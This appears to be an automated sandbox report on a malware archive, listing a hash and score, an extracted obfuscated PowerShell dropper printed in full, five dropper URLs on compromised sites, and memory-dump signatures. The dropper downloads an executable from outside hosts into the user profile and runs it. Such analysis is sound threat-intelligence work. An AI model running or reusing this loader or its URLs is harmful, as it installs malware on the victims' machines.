Malware Samples(2).zip

General
Target: Malware Samples(2).zip
Filesize: N/A
Completed: 01-01-2020 05:09
Score: 10/10
MD5: N/A
SHA1: N/A
SHA256: 560d99887286ea550542c684b208ab356394e22d45571c64765653543fbf1dd3

Malware Config

Extracted

Language: ps1
Source $Oqojrpmkdzlg='Geusckfeislh';$Sgynadtdzi = '218';$Fsncjfbnouvcw='Vrtgwojhgrqk';$Isveftscymko=$env:userprofile+'\'+$Sgynadtdzi+'.exe';$Ykjzmxgyekpf='Xhhivpxtn';$Pdzvevbhes=.('new-obj'+'e'+'ct') nEt.WebcLiEnT;$Mvcblrhkzozg='https://lilikhendarwati.com/wp-admin/JbdTQoQQ/*http://www.zhangboo.com/wp-admin/lwhcvV/*http://test.windsorheatingandair.com/wp-includes/r9lv-4teq5ff-8759846140/*https://www.jackiejill.com/wp-includes/yiqr4r6a-dwt7s0u-26965878/*http://apolina.pl/engl/1tuh6ul-gakf89-994/'."s`pLIT"('*');$Jvkhktvtsqj='Klmwnirr';foreach($Mzmqbzjug in $Mvcblrhkzozg){try{$Pdzvevbhes."do`Wnl`OAdfILE"($Mzmqbzjug, $Isveftscymko);$Kykhosxe='Jccvrurtmy';If ((&('Get-'+'I'+'tem') $Isveftscymko)."lEn`Gth" -ge 31454) {[Diagnostics.Process]::"STa`RT"($Isveftscymko);$Dykdageiykrai='Gaulnathjq';break;$Rxfapwcgiepw='Clskviufmldd'}}catch{}}$Kramunnkskce='Dblxnvyhpyvx'
URLs
exe.dropper  https://lilikhendarwati.com/wp-admin/JbdTQoQQ/
exe.dropper  http://www.zhangboo.com/wp-admin/lwhcvV/
exe.dropper  http://test.windsorheatingandair.com/wp-includes/r9lv-4teq5ff-8759846140/
exe.dropper  https://www.jackiejill.com/wp-includes/yiqr4r6a-dwt7s0u-26965878/
exe.dropper  http://apolina.pl/engl/1tuh6ul-gakf89-994/

Signatures

    Downloads
    • memory/844-0-0x0000000006100000-0x0000000006104000-memory.dmp
    • memory/844-1-0x00000000061F9000-0x00000000061FD000-memory.dmp
    • memory/844-2-0x00000000061F9000-0x00000000061FD000-memory.dmp
    • memory/844-3-0x00000000095A0000-0x00000000095A4000-memory.dmp